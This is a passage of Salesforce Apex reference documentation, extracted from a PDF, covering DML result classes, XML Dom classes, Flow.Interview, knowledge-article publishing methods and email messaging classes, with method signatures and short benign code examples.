Account[] accts = new List<Account>{
new Account(Name='Account1'),
new Account()};
Database.SaveResult[] srList = Database.insert(accts, false);
// Iterate through each returned result
for (Database.SaveResult sr : srList) {
if (sr.isSuccess()) {
// Operation was successful, so get the ID of the record that was processed
System.debug('Successfully inserted account. Account ID: ' + sr.getId());
}
else {
// Operation failed, so get all errors
for(Database.Error err : sr.getErrors()) {
System.debug('The following error has occurred.');
System.debug(err.getStatusCode() + ': ' + err.getMessage());
System.debug('Account fields that affected this error: ' + err.getFields());
}
}
}
SaveResult Methods
The following are methods for SaveResult. All are instance methods.
IN THIS SECTION:
getErrors()
If an error occurred, returns an array of one or more database error objects providing the error code and description.
getId()
Returns the ID of the sObject you were trying to insert or update.
isSuccess()
Returns a Boolean that is set to true if the DML operation was successful for this object, false otherwise.
getErrors()
If an error occurred, returns an array of one or more database error objects providing the error code and description.
1121
Reference
UndeleteResult Class
Signature
public Database.Error[] getErrors()
Return Value
Type: Database.Error[]
getId()
Returns the ID of the sObject you were trying to insert or update.
Signature
public ID getId()
Return Value
Type: ID
Usage
If this field contains a value, the object was successfully inserted or updated. If this field is empty, the operation was not successful for
that object.
isSuccess()
Returns a Boolean that is set to true if the DML operation was successful for this object, false otherwise.
Signature
public Boolean isSuccess()
Return Value
Type: Boolean
UndeleteResult Class
The result of an undelete DML operation returned by the Database.undelete method.
Namespace
Database
Usage
An array of Database.UndeleteResult objects is returned with the undelete database method. Each element in the UndeleteResult
array corresponds to the sObject array passed as the sObject[] parameter in the undelete Database method; that is, the first
1122
Reference
UndeleteResult Class
element in the UndeleteResult array matches the first element passed in the sObject array, the second element corresponds with the
second element, and so on. If only one sObject is passed in, the UndeleteResults array contains a single element.
UndeleteResult Methods
The following are methods for UndeleteResult. All are instance methods.
IN THIS SECTION:
getErrors()
If an error occurred, returns an array of one or more database error objects providing the error code and description.
getId()
Returns the ID of the sObject you were trying to undelete.
isSuccess()
Returns a Boolean value that is set to true if the DML operation was successful for this object, false otherwise.
getErrors()
If an error occurred, returns an array of one or more database error objects providing the error code and description.
Signature
public Database.Error[] getErrors()
Return Value
Type: Database.Error[]
getId()
Returns the ID of the sObject you were trying to undelete.
Signature
public ID getId()
Return Value
Type: ID
Usage
If this field contains a value, the object was successfully undeleted. If this field is empty, the operation was not successful for that object.
isSuccess()
Returns a Boolean value that is set to true if the DML operation was successful for this object, false otherwise.
1123
Reference
UpsertResult Class
Signature
public Boolean isSuccess()
Return Value
Type: Boolean
UpsertResult Class
The result of an upsert DML operation returned by the Database.upsert method.
Namespace
Database
Usage
An array of Database.UpsertResult objects is returned with the upsert database method. Each element in the UpsertResult array
corresponds to the sObject array passed as the sObject[] parameter in the upsert Database method; that is, the first element
in the UpsertResult array matches the first element passed in the sObject array, the second element corresponds with the second element,
and so on. If only one sObject is passed in, the UpsertResults array contains a single element.
UpsertResult Methods
The following are methods for UpsertResult. All are instance methods.
IN THIS SECTION:
getErrors()
If an error occurred, returns an array of one or more database error objects providing the error code and description.
getId()
Returns the ID of the sObject you were trying to update or insert.
isCreated()
A Boolean value that is set to true if the record was created, false if the record was updated.
isSuccess()
Returns a Boolean value that is set to true if the DML operation was successful for this object, false otherwise.
getErrors()
If an error occurred, returns an array of one or more database error objects providing the error code and description.
Signature
public Database.Error[] getErrors()
1124
Reference
Dom Namespace
Return Value
Type: Database.Error []
getId()
Returns the ID of the sObject you were trying to update or insert.
Signature
public ID getId()
Return Value
Type: ID
Usage
If this field contains a value, the object was successfully updated or inserted. If this field is empty, the operation was not successful for
that object.
isCreated()
A Boolean value that is set to true if the record was created, false if the record was updated.
Signature
public Boolean isCreated()
Return Value
Type: Boolean
isSuccess()
Returns a Boolean value that is set to true if the DML operation was successful for this object, false otherwise.
Signature
public Boolean isSuccess()
Return Value
Type: Boolean
Dom Namespace
The Dom namespace provides classes and methods for approval processing.
The following are the classes in the Dom namespace.
1125
Reference
Document Class
IN THIS SECTION:
Document Class
Use the Document class to process XML content.
XmlNode Class
Use the XmlNode class to work with a node in an XML document.
Document Class
Use the Document class to process XML content.
Namespace
Dom
Usage
One common application is to use it to create the body of a request for HttpRequest or to parse a response accessed by HttpResponse.
IN THIS SECTION:
Document Constructors
Document Methods
Document Constructors
The following are constructors for Document.
IN THIS SECTION:
Document()
Creates a new instance of the Dom.Document class.
Document()
Creates a new instance of the Dom.Document class.
Signature
public Document()
Document Methods
The following are methods for Document. All are instance methods.
IN THIS SECTION:
createRootElement(String, String, String)
Creates the top-level root element for a document.
1126
Reference
Document Class
getRootElement()
Returns the top-level root element node in the document. If this method returns null, the root element has not been created yet.
load(String)
Parse the XML representation of the document specified in the xml argument and load it into a document.
toXmlString()
Returns the XML representation of the document as a String.
Signature
public Dom.XmlNode createRootElement(String name, String namespace, String prefix)
Parameters
name
Type: String
namespace
Type: String
prefix
Type: String
Return Value
Type: Dom.XmlNode
Usage
For more information about namespaces, see XML Namespaces.
Calling this method more than once on a document generates an error as a document can have only one root element.
getRootElement()
Returns the top-level root element node in the document. If this method returns null, the root element has not been created yet.
Signature
public Dom.XmlNode getRootElement()
Return Value
Type: Dom.XmlNode
load(String)
Parse the XML representation of the document specified in the xml argument and load it into a document.
1127
Reference
XmlNode Class
Signature
public Void load(String xml)
Parameters
xml
Type: String
Return Value
Type: Void
Example
Dom.Document doc = new Dom.Document();
doc.load(xml);
toXmlString()
Returns the XML representation of the document as a String.
Signature
public String toXmlString()
Return Value
Type: String
XmlNode Class
Use the XmlNode class to work with a node in an XML document.
Namespace
Dom
XmlNode Methods
The following are methods for XmlNode. All are instance methods.
IN THIS SECTION:
addChildElement(String, String, String)
Creates a child element node for this node.
addCommentNode(String)
Creates a child comment node for this node.
1128
Reference
XmlNode Class
addTextNode(String)
Creates a child text node for this node.
getAttribute(String, String)
Returns namespacePrefix:attributeValue for the given key and key namespace.
getAttributeCount()
Returns the number of attributes for this node.
getAttributeKeyAt(Integer)
Returns the attribute key for the given index. Index values start at 0.
getAttributeKeyNsAt(Integer)
Returns the attribute key namespace for the given index.
getAttributeValue(String, String)
Returns the attribute value for the given key and key namespace.
getAttributeValueNs(String, String)
Returns the attribute value namespace for the given key and key namespace.
getChildElement(String, String)
Returns the child element node for the node with the given name and namespace.
getChildElements()
Returns the child element nodes for this node. This doesn't include child text or comment nodes.
getChildren()
Returns the child nodes for this node. This includes all node types.
getName()
Returns the element name.
getNamespace()
Returns the namespace of the element.
getNamespaceFor(String)
Returns the namespace of the element for the given prefix.
getNodeType()
Returns the node type.
getParent()
Returns the parent of this element.
getPrefixFor(String)
Returns the prefix of the given namespace.
getText()
Returns the text for this node.
removeAttribute(String, String)
Removes the attribute with the given key and key namespace. Returns true if successful, false otherwise.
removeChild(Dom.XmlNode)
Removes the given child node.
setAttribute(String, String)
Sets the key attribute value.
1129
Reference
XmlNode Class
Signature
public Dom.XmlNode addChildElement(String name, String namespace, String prefix)
Parameters
name
Type: String
The name argument can't have a null value.
namespace
Type: String
prefix
Type: String
Return Value
Type: Dom.XmlNode
Usage
If the namespace argument has a non-null value and the prefix argument is null, the namespace is set as the default
namespace.
If the prefix argument is null, Salesforce automatically assigns a prefix for the element. The format of the automatic prefix is
nsi, where i is a number.If the prefix argument is '', the namespace is set as the default namespace.
addCommentNode(String)
Creates a child comment node for this node.
Signature
public Dom.XmlNode addCommentNode(String text)
Parameters
text
Type: String
The text argument can't have a null value.
1130
Reference
XmlNode Class
Return Value
Type: Dom.XmlNode
addTextNode(String)
Creates a child text node for this node.
Signature
public Dom.XmlNode addTextNode(String text)
Parameters
text
Type: String
The text argument can't have a null value.
Return Value
Type: Dom.XmlNode
getAttribute(String, String)
Returns namespacePrefix:attributeValue for the given key and key namespace.
Signature
public String getAttribute(String key, String keyNamespace)
Parameters
key
Type: String
keyNamespace
Type: String
Return Value
Type: String
Example
For example, for the <foo a:b="c:d" /> element:
getAttribute returns c:d
getAttributeValue returns d
getAttributeCount()
Returns the number of attributes for this node.
1131
Reference
XmlNode Class
Signature
public Integer getAttributeCount()
Return Value
Type: Integer
getAttributeKeyAt(Integer)
Returns the attribute key for the given index. Index values start at 0.
Signature
public String getAttributeKeyAt(Integer index)
Parameters
index
Type: Integer
Return Value
Type: String
getAttributeKeyNsAt(Integer)
Returns the attribute key namespace for the given index.
Signature
public String getAttributeKeyNsAt(Integer index)
Parameters
index
Type: Integer
Return Value
Type: String
getAttributeValue(String, String)
Returns the attribute value for the given key and key namespace.
Signature
public String getAttributeValue(String key, String keyNamespace)
1132
Reference
XmlNode Class
Parameters
key
Type: String
keyNamespace
Type: String
Return Value
Type: String
Example
For example, for the <foo a:b="c:d" /> element:
getAttribute returns c:d
getAttributeValue returns d
getAttributeValueNs(String, String)
Returns the attribute value namespace for the given key and key namespace.
Signature
public String getAttributeValueNs(String key, String keyNamespace)
Parameters
key
Type: String
keyNamespace
Type: String
Return Value
Type: String
getChildElement(String, String)
Returns the child element node for the node with the given name and namespace.
Signature
public Dom.XmlNode getChildElement(String name, String namespace)
Parameters
name
Type: String
1133
Reference
XmlNode Class
namespace
Type: String
Return Value
Type: Dom.XmlNode
getChildElements()
Returns the child element nodes for this node. This doesn't include child text or comment nodes.
Signature
public Dom.XmlNode[] getChildElements()
Return Value
Type: Dom.XmlNode[]
getChildren()
Returns the child nodes for this node. This includes all node types.
Signature
public Dom.XmlNode[] getChildren()
Return Value
Type: Dom.XmlNode[]
getName()
Returns the element name.
Signature
public String getName()
Return Value
Type: String
getNamespace()
Returns the namespace of the element.
Signature
public String getNamespace()
1134
Reference
XmlNode Class
Return Value
Type: String
getNamespaceFor(String)
Returns the namespace of the element for the given prefix.
Signature
public String getNamespaceFor(String prefix)
Parameters
prefix
Type: String
Return Value
Type: String
getNodeType()
Returns the node type.
Signature
public Dom.XmlNodeType getNodeType()
Return Value
Type: Dom.XmlNodeType
getParent()
Returns the parent of this element.
Signature
public Dom.XmlNode getParent()
Return Value
Type: Dom.XmlNode
getPrefixFor(String)
Returns the prefix of the given namespace.
1135
Reference
XmlNode Class
Signature
public String getPrefixFor(String namespace)
Parameters
namespace
Type: String
The namespace argument can't have a null value.
Return Value
Type: String
getText()
Returns the text for this node.
Signature
public String getText()
Return Value
Type: String
removeAttribute(String, String)
Removes the attribute with the given key and key namespace. Returns true if successful, false otherwise.
Signature
public Boolean removeAttribute(String key, String keyNamespace)
Parameters
key
Type: String
keyNamespace
Type: String
Return Value
Type: Boolean
removeChild(Dom.XmlNode)
Removes the given child node.
1136
Reference
XmlNode Class
Signature
public Boolean removeChild(Dom.XmlNode childNode)
Parameters
childNode
Type: Dom.XmlNode
Return Value
Type: Boolean
setAttribute(String, String)
Sets the key attribute value.
Signature
public Void setAttribute(String key, String value)
Parameters
key
Type: String
value
Type: String
Return Value
Type: Void
Signature
public Void setAttributeNs(String key, String value, String keyNamespace, String
valueNamespace)
Parameters
key
Type: String
value
Type: String
keyNamespace
Type: String
1137
Reference
Flow Namespace
valueNamespace
Type: String
Return Value
Type: Void
setNamespace(String, String)
Sets the namespace for the given prefix.
Signature
public Void setNamespace(String prefix, String namespace)
Parameters
prefix
Type: String
namespace
Type: String
Return Value
Type: Void
Flow Namespace
The Flow namespace provides a class for advanced Visualforce controller access to flows.
The following is the class in the Flow namespace.
IN THIS SECTION:
Interview Class
The Flow.Interview class provides advanced Visualforce controller access to flows and the ability to start a flow.
Interview Class
The Flow.Interview class provides advanced Visualforce controller access to flows and the ability to start a flow.
Namespace
Flow
1138
Reference
Interview Class
Usage
The Flow.Interview class is used with Visual Workflow. Use the methods in this class to launch a trigger-ready flow or to enable
a Visualforce controller to access a flow variable..
Example
The following sample uses the getVariableValue method to obtain breadcrumb (navigation) information from the flow embedded
in the Visualforce page. If that flow contains subflow elements, and each of the referenced flows also contains a vaBreadCrumb
variable, the Visualforce page can provide users with breadcrumbs regardless of which flow the interview is running.
public class SampleController {
//Instance of the flow
public Flow.Interview.Flow_Template_Gallery myFlow {get; set;}
public String getBreadCrumb() {
String aBreadCrumb;
if (myFlow==null) { return 'Home';}
else aBreadCrumb = (String) myFlow.getVariableValue('vaBreadCrumb');
return(aBreadCrumb==null ? 'Home': aBreadCrumb);
}
}
The following includes a sample controller that starts a flow and the corresponding Visualforce page. The Visualforce page contains an
input box and a start button. When the user enters a number in the input box and clicks Start, the controllers start method is called,
which saves the user-entered value to the flows input variable and launches the flow using the start method. The flow doubles
the value of input and assigns it to the output variable, and the output label displays the value for output by using the
getVariableValue method.
public class FlowController {
//Instance of the Flow
public Flow.Interview.doubler myFlow {get; set;}
public Double value {get; set;}
public Double getOutput() {
if (myFlow == null) return null;
return (Double)(myFlow.getVariableValue('v1'));
}
public void start() {
Map<String, Object> myMap = new Map<String, Object>();
myMap.put('v1', input);
myFlow = new Flow.Interview.doubler(myMap);
myFlow.start();
}
}
1139
Reference
Interview Class
The following is the Visualforce page that uses the sample flow controller.
<apex:page controller="FlowController">
<apex:outputLabel id="text">v1 = {!output}</apex:outputLabel>
<apex:form >
value : <apex:inputText value="{!output}"/>
<apex:commandButton action="{!start}" value="Start" reRender="text"/>
</apex:form>
</apex:page>
Interview Methods
The following are instance methods for Interview.
IN THIS SECTION:
getVariableValue(String)
Returns the value of the specified flow variable. The flow variable can be in the flow embedded in the Visualforce page, or in a
separate flow that is called by a subflow element.
start()
Launches a trigger-ready flow.
getVariableValue(String)
Returns the value of the specified flow variable. The flow variable can be in the flow embedded in the Visualforce page, or in a separate
flow that is called by a subflow element.
Signature
public Object getVariableValue(String variableName)
Parameters
variableName
Type: String
Specifies the unique name of the flow variable.
Return Value
Type: Object
Usage
The returned variable value comes from whichever flow the interview is currently running. If the specified variable cant be found in that
flow, the method returns null.
This method checks for the existence of the variable at run time only, not at compile time.
1140
Reference
KbManagement Namespace
start()
Launches a trigger-ready flow.
Signature
public Void start()
Return Value
Type: Void
Usage
This method can be used only with trigger-ready flows. A trigger-ready flow is a flow that can be launched without user interaction, such
as from a flow trigger workflow action or the Apex interview.start method. Because trigger-ready flows must be able to run
in bulk and without user interaction, they cant contain steps, screens, choices, or dynamic choices in the active flow versionor the
latest flow version, if theres no active version.
KbManagement Namespace
The KbManagement namespace provides a class for managing knowledge articles.
The following is the class in the KbManagement namespace.
IN THIS SECTION:
PublishingService Class
Use the methods in the KbManagement.PublishingService class to manage the lifecycle of an article and its translations.
PublishingService Class
Use the methods in the KbManagement.PublishingService class to manage the lifecycle of an article and its translations.
Namespace
KbManagement
Usage
Use the methods in the KbManagement.PublishingService class to manage the following parts of the lifecycle of an article
and its translations:
Publishing
Updating
Retrieving
Deleting
Submitting for translation
Setting a translation to complete or incomplete status
1141
Reference
PublishingService Class
Archiving
Assigning review tasks for draft articles or translations
Note: Date values are based on GMT.
To use the methods in this class, you must enable Salesforce Knowledge. See Salesforce Knowledge Implementation Guide for more
information on setting up Salesforce Knowledge.
PublishingService Methods
The following are methods for PublishingService. All methods are static.
IN THIS SECTION:
archiveOnlineArticle(String, Datetime)
Archives an online version of an article. If the specified scheduledDate is null, the article is archived immediately. Otherwise, it archives
the article on the scheduled date.
assignDraftArticleTask(String, String, String, Datetime, Boolean)
Assigns a review task related to a draft article.
assignDraftTranslationTask(String, String, String, Datetime, Boolean)
Assigns a review task related to a draft translation.
cancelScheduledArchivingOfArticle(String)
Cancels the scheduled archiving of an online article.
cancelScheduledPublicationOfArticle(String)
Cancels the scheduled publication of a draft article.
completeTranslation(String)
Puts a translation in a completed state that is ready to publish.
deleteArchivedArticle(String)
Deletes an archived article.
deleteArchivedArticleVersion(String, Integer)
Deletes a specific version of an archived article.
deleteDraftArticle(String)
Deletes a draft article.
deleteDraftTranslation(String)
Deletes a draft translation.
editArchivedArticle(String)
Creates a draft article from the archived master version and returns the new draft master version ID of the article.
editOnlineArticle(String, Boolean)
Creates a draft article from the online version and returns the new draft master version ID of the article. Also, unpublishes the online
article, if unpublish is set to true.
editPublishedTranslation(String, String, Boolean)
Creates a draft version of the online translation for a specific language and returns the new draft master version ID of the article. Also,
unpublishes the article, if set to true.
1142
Reference
PublishingService Class
publishArticle(String, Boolean)
Publishes an article. If flagAsNew is set to true, the article is published as a major version.
restoreOldVersion(String, Integer)
Creates a draft article from an existing online article based on the specified archived version of the article and returns the article
version ID.
scheduleForPublication(String, Datetime)
Schedules the article for publication as a major version. If the specified date is null, the article is published immediately.
setTranslationToIncomplete(String)
Sets a draft translation that is ready for publication back to in progress status.
submitForTranslation(String, String, String, Datetime)
Submits an article for translation to the specified language. Also assigns the specified user and due date to the submittal and returns
new ID of the draft translation.
archiveOnlineArticle(String, Datetime)
Archives an online version of an article. If the specified scheduledDate is null, the article is archived immediately. Otherwise, it archives
the article on the scheduled date.
Signature
public static Void archiveOnlineArticle(String articleId, Datetime scheduledDate)
Parameters
articleId
Type: String
scheduledDate
Type: Datetime
Return Value
Type: Void
Example
String articleId = 'Insert article ID';
Datetime scheduledDate = Datetime.newInstanceGmt(2012, 12,1,13,30,0);
KbManagement.PublishingService.archiveOnlineArticle(articleId, scheduledDate);
Signature
public static Void assignDraftArticleTask(String articleId, String assigneeID, String
instructions, Datetime dueDate, Boolean sendEmailNotification)
1143
Reference
PublishingService Class
Parameters
articleId
Type: String
assigneeID
Type: String
instructions
Type: String
dueDate
Type: Datetime
sendEmailNotification
Type: Boolean
Return Value
Type: Void
Example
String articleId = 'Insert article ID';
String assigneeId = '';
String instructions = 'Please review this draft.';
Datetime dueDate = Datetime.newInstanceGmt(2012, 12,1);
KbManagement.PublishingService.assignDraftArticleTask(articleId, assigneeId, instructions,
dueDate, true);
Signature
public static Void assignDraftTranslationTask(String articleVersionId, String assigneeID,
String instructions, Datetime dueDate, Boolean sendEmailNotification)
Parameters
articleVersionId
Type: String
assigneeID
Type: String
instructions
Type: String
dueDate
Type: Datetime
sendEmailNotification
Type: Boolean
1144
Reference
PublishingService Class
Return Value
Type: Void
Example
String articleId = 'Insert article ID';
String assigneeId = 'Insert assignee ID';
String instructions = 'Please review this draft.';
Datetime dueDate = Datetime.newInstanceGmt(2012, 12,1);
KbManagement.PublishingService.assignDraftTranslationTask(articleId, assigneeId,
instructions, dueDate, true);
cancelScheduledArchivingOfArticle(String)
Cancels the scheduled archiving of an online article.
Signature
public static Void cancelScheduledArchivingOfArticle(String articleId)
Parameters
articleId
Type: String
Return Value
Type: Void
Example
String articleId = 'Insert article ID';
KbManagement.PublishingService.cancelScheduledArchivingOfArticle (articleId);
cancelScheduledPublicationOfArticle(String)
Cancels the scheduled publication of a draft article.
Signature
public static Void cancelScheduledPublicationOfArticle(String articleId)
Parameters
articleId
Type: String
Return Value
Type: Void
1145
Reference
PublishingService Class
Example
String articleId = 'Insert article ID';
KbManagement.PublishingService.cancelScheduledPublicationOfArticle (articleId);
completeTranslation(String)
Puts a translation in a completed state that is ready to publish.
Signature
public static Void completeTranslation(String articleVersionId)
Parameters
articleVersionId
Type: String
Return Value
Type: Void
Example
String articleVersionId = 'Insert article ID';
KbManagement.PublishingService.completeTranslation(articleVersionId);
deleteArchivedArticle(String)
Deletes an archived article.
Signature
public static Void deleteArchivedArticle(String articleId)
Parameters
articleId
Type: String
Return Value
Type: Void
Example
String articleId = 'Insert article ID';
KbManagement.PublishingService.deleteArchivedArticle(articleId);
1146
Reference
PublishingService Class
deleteArchivedArticleVersion(String, Integer)
Deletes a specific version of an archived article.
Signature
public static Void deleteArchivedArticleVersion(String articleId, Integer versionNumber)
Parameters
articleId
Type: String
versionNumber
Type: Integer
Return Value
Type: Void
Example
String articleId = 'Insert article ID';
Integer versionNumber = 1;
KbManagement.PublishingService.deleteArchivedArticleVersion(articleId, versionNumber);
deleteDraftArticle(String)
Deletes a draft article.
Signature
public static Void deleteDraftArticle(String articleId)
Parameters
articleId
Type: String
Return Value
Type: Void
Example
String articleId = 'Insert article ID';
KbManagement.PublishingService.deleteDraftArticle(articleId);
deleteDraftTranslation(String)
Deletes a draft translation.
1147
Reference
PublishingService Class
Signature
public static Void deleteDraftTranslation(String articleVersionId)
Parameters
articleVersionId
Type: String
Return Value
Type: Void
Example
String articleVersionId = 'Insert article ID';
KbManagement.PublishingService.deleteDraftTranslation (articleVersionId);
editArchivedArticle(String)
Creates a draft article from the archived master version and returns the new draft master version ID of the article.
Signature
public static String editArchivedArticle(String articleId)
Parameters
articleId
Type: String
Return Value
Type: String
Example
String articleId = 'Insert article ID';
String id = KbManagement.PublishingService.editArchivedArticle(articleId);
editOnlineArticle(String, Boolean)
Creates a draft article from the online version and returns the new draft master version ID of the article. Also, unpublishes the online
article, if unpublish is set to true.
Signature
public static String editOnlineArticle(String articleId, Boolean unpublish)
1148
Reference
PublishingService Class
Parameters
articleId
Type: String
unpublish
Type: Boolean
Return Value
Type: String
Example
String articleId = 'Insert article ID';
String id = KbManagement.PublishingService.editOnlineArticle (articleId, true);
Signature
public static String editPublishedTranslation(String articleId, String language, Boolean
unpublish)
Parameters
articleId
Type: String
language
Type: String
unpublish
Type: Boolean
Return Value
Type: String
Example
String articleId = 'Insert article ID';
String language = 'fr';
String id = KbManagement.PublishingService.editPublishedTranslation(articleId, language,
true);
publishArticle(String, Boolean)
Publishes an article. If flagAsNew is set to true, the article is published as a major version.
1149
Reference
PublishingService Class
Signature
public static Void publishArticle(String articleId, Boolean flagAsNew)
Parameters
articleId
Type: String
flagAsNew
Type: Boolean
Return Value
Type: Void
Example
String articleId = 'Insert article ID';
KbManagement.PublishingService.publishArticle(articleId, true);
restoreOldVersion(String, Integer)
Creates a draft article from an existing online article based on the specified archived version of the article and returns the article version
ID.
Signature
public static String restoreOldVersion(String articleId, Integer versionNumber)
Parameters
articleId
Type: String
versionNumber
Type: Integer
Return Value
Type: String
Example
String articleId = 'Insert article ID';
String id = KbManagement.PublishingService.restoreOldVersion (articleId, 1);
scheduleForPublication(String, Datetime)
Schedules the article for publication as a major version. If the specified date is null, the article is published immediately.
1150
Reference
PublishingService Class
Signature
public static Void scheduleForPublication(String articleId, Datetime scheduledDate)
Parameters
articleId
Type: String
scheduledDate
Type: Datetime
Return Value
Type: Void
Example
String articleId = 'Insert article ID';
Datetime scheduledDate = Datetime.newInstanceGmt(2012, 12,1,13,30,0);
KbManagement.PublishingService.scheduleForPublication(articleId, scheduledDate);
setTranslationToIncomplete(String)
Sets a draft translation that is ready for publication back to in progress status.
Signature
public static Void setTranslationToIncomplete(String articleVersionId)
Parameters
articleVersionId
Type: String
Return Value
Type: Void
Example
String articleVersionId = 'Insert article ID';
KbManagement.PublishingService.setTranslationToIncomplete(articleVersionId);
1151
Reference
Messaging Namespace
Signature
public static String submitForTranslation(String articleId, String language, String
assigneeID, Datetime dueDate)
Parameters
articleId
Type: String
language
Type: String
assigneeID
Type: String
dueDate
Type: Datetime
Return Value
Type: String
Example
String articleId = 'Insert article ID';
String language = 'fr';
String assigneeId = 'Insert assignee ID';
Datetime dueDate = Datetime.newInstanceGmt(2012, 12,1);
String id = KbManagement.PublishingService.submitForTranslation(articleId, language,
assigneeId, dueDate);
Messaging Namespace
The Messaging namespace provides classes and methods for Salesforce outbound and inbound email functionality.
The following are the classes in the Messaging namespace.
IN THIS SECTION:
Email Class (Base Email Methods)
Contains base email methods common to both single and mass email.
EmailFileAttachment Class
EmailFileAttachment is used in SingleEmailMessage to specify attachments passed in as part of the request, as opposed to existing
documents in Salesforce.
InboundEmail Class
Represents an inbound email object.
InboundEmail.BinaryAttachment Class
An InboundEmail object stores binary attachments in an InboundEmail.BinaryAttachment object.
1152
Reference
InboundEmail.TextAttachment Class
An InboundEmail object stores text attachments in an InboundEmail.TextAttachment object.
InboundEmailResult Class
The InboundEmailResult object is used to return the result of the email service. If this object is null, the result is assumed to be
successful.
InboundEnvelope Class
The InboundEnvelope object stores the envelope information associated with the inbound email, and has the following fields.
MassEmailMessage Class
Contains methods for sending mass email.
InboundEmail.Header Class
An InboundEmail object stores RFC 2822 email header information in an InboundEmail.Header object with the following properties.
PushNotification Class
PushNotification is used to configure push notifications and send them from an Apex trigger.
PushNotificationPayload Class
Contains methods to create the notification message payload for an Apple device.
SendEmailError Class
Represents an error that the SendEmailResult object may contain.
SendEmailResult Class
Contains the result of sending an email message.
SingleEmailMessage Methods
Contains methods for sending single email messages.
Namespace
Messaging
Usage
Note: If templates are not being used, all email content must be in plain text, HTML, or both.Visualforce email templates cannot
be used for mass email.
Email Methods
The following are methods for Email. All are instance methods.
IN THIS SECTION:
setBccSender(Boolean)
Indicates whether the email sender receives a copy of the email that is sent. For a mass mail, the sender is only copied on the first
email sent.
1153
Reference
setReplyTo(String)
Optional. The email address that receives the message when a recipient replies.
setTemplateID(ID)
The ID of the template to be merged to create this email. You must specify a value for setTemplateId, setHtmlBody, or
setPlainTextBody. Or, you can define both setHtmlBody and setPlainTextBody.
setSaveAsActivity(Boolean)
Optional. The default value is true, meaning the email is saved as an activity. This argument only applies if the recipient list is based
on targetObjectId or targetObjectIds. If HTML email tracking is enabled for the organization, you will be able to track
open rates.
setSenderDisplayName(String)
Optional. The name that appears on the From line of the email. This cannot be set if the object associated with a
setOrgWideEmailAddressId for a SingleEmailMessage has defined its DisplayName field.
setUseSignature(Boolean)
Indicates whether the email includes an email signature if the user has one configured. The default is true, meaning if the user
has a signature it is included in the email unless you specify false.
setBccSender(Boolean)
Indicates whether the email sender receives a copy of the email that is sent. For a mass mail, the sender is only copied on the first email
sent.
Signature
public Void setBccSender(Boolean bcc)
Parameters
bcc
Type: Boolean
Return Value
Type: Void
Usage
Note: If the BCC compliance option is set at the organization level, the user cannot add BCC addresses on standard messages.
The following error code is returned: BCC_NOT_ALLOWED_IF_BCC_ COMPLIANCE_ENABLED. Contact your Salesforce
representative for information on BCC compliance.
setReplyTo(String)
Optional. The email address that receives the message when a recipient replies.
Signature
public Void setReplyTo(String replyAddress)
1154
Reference
Parameters
replyAddress
Type: String
Return Value
Type: Void
setTemplateID(ID)
The ID of the template to be merged to create this email. You must specify a value for setTemplateId, setHtmlBody, or
setPlainTextBody. Or, you can define both setHtmlBody and setPlainTextBody.
Signature
public Void setTemplateID(ID templateID)
Parameters
templateID
Type: ID
Return Value
Type: Void
Usage
Note: setHtmlBody and setPlainTextBody apply only to single email methods, not to mass email methods.
setSaveAsActivity(Boolean)
Optional. The default value is true, meaning the email is saved as an activity. This argument only applies if the recipient list is based
on targetObjectId or targetObjectIds. If HTML email tracking is enabled for the organization, you will be able to track
open rates.
Signature
public Void setSaveAsActivity(Boolean saveAsActivity)
Parameters
saveAsActivity
Type: Boolean
Return Value
Type: Void
1155
Reference
EmailFileAttachment Class
setSenderDisplayName(String)
Optional. The name that appears on the From line of the email. This cannot be set if the object associated with a
setOrgWideEmailAddressId for a SingleEmailMessage has defined its DisplayName field.
Signature
public Void setSenderDisplayName(String displayName)
Parameters
displayName
Type: String
Return Value
Type: Void
setUseSignature(Boolean)
Indicates whether the email includes an email signature if the user has one configured. The default is true, meaning if the user has a
signature it is included in the email unless you specify false.
Signature
public Void setUseSignature(Boolean useSignature)
Parameters
useSignature
Type: Boolean
Return Value
Type: Void
EmailFileAttachment Class
EmailFileAttachment is used in SingleEmailMessage to specify attachments passed in as part of the request, as opposed to existing
documents in Salesforce.
Namespace
Messaging
IN THIS SECTION:
EmailFileAttachment Constructors
EmailFileAttachment Methods
1156
Reference
EmailFileAttachment Class
EmailFileAttachment Constructors
The following are constructors for EmailFileAttachment.
IN THIS SECTION:
EmailFileAttachment()
Creates a new instance of the Messaging.EmailFileAttachment class.
EmailFileAttachment()
Creates a new instance of the Messaging.EmailFileAttachment class.
Signature
public EmailFileAttachment()
EmailFileAttachment Methods
The following are methods for EmailFileAttachment. All are instance methods.
IN THIS SECTION:
setBody(Blob)
Sets the attachment itself.
setContentType(String)
Sets the attachment's Content-Type.
setFileName(String)
Sets the name of the file to attach.
setInline(Boolean)
Specifies a Content-Disposition of inline (true) or attachment (false).
setBody(Blob)
Sets the attachment itself.
Signature
public Void setBody(Blob attachment)
Parameters
attachment
Type: Blob
Return Value
Type: Void
1157
Reference
EmailFileAttachment Class
setContentType(String)
Sets the attachment's Content-Type.
Signature
public Void setContentType(String content_type)
Parameters
content_type
Type: String
Return Value
Type: Void
setFileName(String)
Sets the name of the file to attach.
Signature
public Void setFileName(String file_name)
Parameters
file_name
Type: String
Return Value
Type: Void
setInline(Boolean)
Specifies a Content-Disposition of inline (true) or attachment (false).
Signature
public Void setInline(Boolean Content-Disposition)
Parameters
Content-Disposition
Type: Boolean
Return Value
Type: Void
1158
Reference
InboundEmail Class
Usage
In most cases, inline content is displayed to the user when the message is opened. Attachment content requires user action to be
displayed.
InboundEmail Class
Represents an inbound email object.
Namespace
Messaging
IN THIS SECTION:
InboundEmail Constructors
InboundEmail Properties
InboundEmail Constructors
The following are constructors for InboundEmail.
IN THIS SECTION:
InboundEmail()
Creates a new instance of the Messaging.InboundEmail class.
InboundEmail()
Creates a new instance of the Messaging.InboundEmail class.
Signature
public InboundEmail()
InboundEmail Properties
The following are properties for InboundEmail.
IN THIS SECTION:
binaryAttachments
A list of binary attachments received with the email, if any.
ccAddresses
A list of carbon copy (CC) addresses, if any.
fromAddress
The email address that appears in the From field.
1159
Reference
InboundEmail Class
fromName
The name that appears in the From field, if any.
headers
A list of the RFC 2822 headers in the email.
htmlBody
The HTML version of the email, if specified by the sender.
htmlBodyIsTruncated
Indicates whether the HTML body text is truncated (true) or not (false.)
inReplyTo
The In-Reply-To field of the incoming email. Identifies the email or emails to which this one is a reply (parent emails). Contains the
parent email or emails' message-IDs.
messageId
The Message-IDthe incoming email's unique identifier.
plainTextBody
The plain text version of the email, if specified by the sender.
plainTextBodyIsTruncated
Indicates whether the plain body text is truncated (true) or not (false.)
references
The References field of the incoming email. Identifies an email thread. Contains a list of the parent emails' References and message
IDs, and possibly the In-Reply-To fields.
